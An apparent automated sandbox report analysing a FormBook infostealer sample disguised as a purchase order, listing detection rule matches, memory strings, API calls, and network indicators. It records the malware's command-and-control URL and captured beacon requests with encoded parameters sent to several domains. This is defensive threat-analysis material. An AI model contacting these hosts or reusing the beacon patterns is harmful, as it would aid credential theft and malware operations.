Source: Yara match	File source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\kwqifureL.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: PO_210223.exe

Joe Sandbox ML: detected

Source: 9.2.PO_210223.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\PO_210223.exe

Unpacked PE file: 0.2.PO_210223.exe.890000.0.unpack

Uses 32bit PE files

Show sources

Source: PO_210223.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: PO_210223.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: ipconfig.pdb source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO_210223.exe, 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, ipconfig.exe, 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: PO_210223.exe, ipconfig.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 4x nop then pop edi		9_2_00416C98
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop edi		13_2_009C6C98

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.000666dy.com/ntg/

Source: global traffic	HTTP traffic detected: GET /ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.pophazard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.246835.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.kaieteurny.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 204.11.56.48 204.11.56.48

Source: Joe Sandbox View	ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View	ASN Name: CNSERVERSUS CNSERVERSUS

Source: C:\Windows\explorer.exe

Code function: 10_2_04E0E782 getaddrinfo,setsockopt,recv,

10_2_04E0E782

Source: global traffic	HTTP traffic detected: GET /ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.pophazard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.246835.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.kaieteurny.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.pophazard.com

Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libg.png)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000002.910436982.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: PO_210223.exe, 00000000.00000003.648075554.000000000828D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comcy
Source: PO_210223.exe, 00000000.00000003.648155639.000000000828D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comig
Source: PO_210223.exe, 00000000.00000003.648075554.000000000828D000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comint
Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comk
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comva9y
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: PO_210223.exe, 00000000.00000003.652634958.0000000008285000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO_210223.exe, 00000000.00000003.654377069.0000000008285000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersQ
Source: PO_210223.exe, 00000000.00000003.658906996.0000000008285000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designerse
Source: PO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersiva
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: PO_210223.exe, 00000000.00000003.645891455.000000000826B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comc
Source: PO_210223.exe, 00000000.00000003.645842271.000000000826B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comic
Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: PO_210223.exe, 00000000.00000003.647493837.0000000008252000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO_210223.exe, 00000000.00000003.647755183.0000000008255000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnal
Source: PO_210223.exe, 00000000.00000003.647493837.0000000008252000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnal9y
Source: PO_210223.exe, 00000000.00000003.647129278.0000000008256000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnt7o
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO_210223.exe, 00000000.00000003.655856986.0000000008285000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PO_210223.exe, 00000000.00000003.658733903.0000000008285000.00000004.00000001.sdmp	String found in binary or memory: http://www.monotype.
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pophazard.com/sk-logabpstatus.php?a=aG42QXdLZEpxVDR5Y2RqNUtBbnIvaUNNaWJVdEVQVjlJMUxVR2dwW
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: PO_210223.exe, 00000000.00000003.649005992.0000000008252000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com8i
Source: PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comal
Source: PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comh
Source: PO_210223.exe, 00000000.00000003.649005992.0000000008252000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comlic
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cniy
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: PO_210223.exe, 00000000.00000002.679711505.0000000001030000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: PO_210223.exe

Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00419D50 NtCreateFile,	9_2_00419D50
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00419E00 NtReadFile,	9_2_00419E00
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00419E80 NtClose,	9_2_00419E80
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00419F30 NtAllocateVirtualMemory,	9_2_00419F30
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00419D4A NtCreateFile,	9_2_00419D4A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00419F2A NtAllocateVirtualMemory,	9_2_00419F2A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018499A0 NtCreateSection,LdrInitializeThunk,	9_2_018499A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_01849910
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018498F0 NtReadVirtualMemory,LdrInitializeThunk,	9_2_018498F0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849840 NtDelayExecution,LdrInitializeThunk,	9_2_01849840
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_01849860
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849A00 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_01849A00
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849A20 NtResumeThread,LdrInitializeThunk,	9_2_01849A20
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849A50 NtCreateFile,LdrInitializeThunk,	9_2_01849A50
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018495D0 NtClose,LdrInitializeThunk,	9_2_018495D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849540 NtReadFile,LdrInitializeThunk,	9_2_01849540
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849780 NtMapViewOfSection,LdrInitializeThunk,	9_2_01849780
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018497A0 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_018497A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849710 NtQueryInformationToken,LdrInitializeThunk,	9_2_01849710
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018496E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_018496E0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_01849660
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018499D0 NtCreateProcessEx,	9_2_018499D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849950 NtQueueApcThread,	9_2_01849950
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018498A0 NtWriteVirtualMemory,	9_2_018498A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849820 NtEnumerateKey,	9_2_01849820
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0184B040 NtSuspendThread,	9_2_0184B040
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0184A3B0 NtGetContextThread,	9_2_0184A3B0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849B00 NtSetValueKey,	9_2_01849B00
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849A80 NtOpenDirectoryObject,	9_2_01849A80
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849A10 NtQuerySection,	9_2_01849A10
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018495F0 NtQueryInformationFile,	9_2_018495F0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849520 NtWaitForSingleObject,	9_2_01849520
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0184AD30 NtSetContextThread,	9_2_0184AD30
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849560 NtWriteFile,	9_2_01849560
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849FE0 NtCreateMutant,	9_2_01849FE0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0184A710 NtOpenProcessToken,	9_2_0184A710
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849730 NtQueryVirtualMemory,	9_2_01849730
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849760 NtOpenProcess,	9_2_01849760
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0184A770 NtOpenThread,	9_2_0184A770
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849770 NtSetInformationFile,	9_2_01849770
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018496D0 NtCreateKey,	9_2_018496D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849610 NtEnumerateValueKey,	9_2_01849610
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849650 NtQueryValueKey,	9_2_01849650
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01849670 NtQueryInformationProcess,	9_2_01849670
Source: C:\Windows\explorer.exe	Code function: 10_2_04E0DA32 NtCreateFile,	10_2_04E0DA32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499710 NtQueryInformationToken,LdrInitializeThunk,	13_2_03499710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499FE0 NtCreateMutant,LdrInitializeThunk,	13_2_03499FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499780 NtMapViewOfSection,LdrInitializeThunk,	13_2_03499780
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499A50 NtCreateFile,LdrInitializeThunk,	13_2_03499A50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034996D0 NtCreateKey,LdrInitializeThunk,	13_2_034996D0
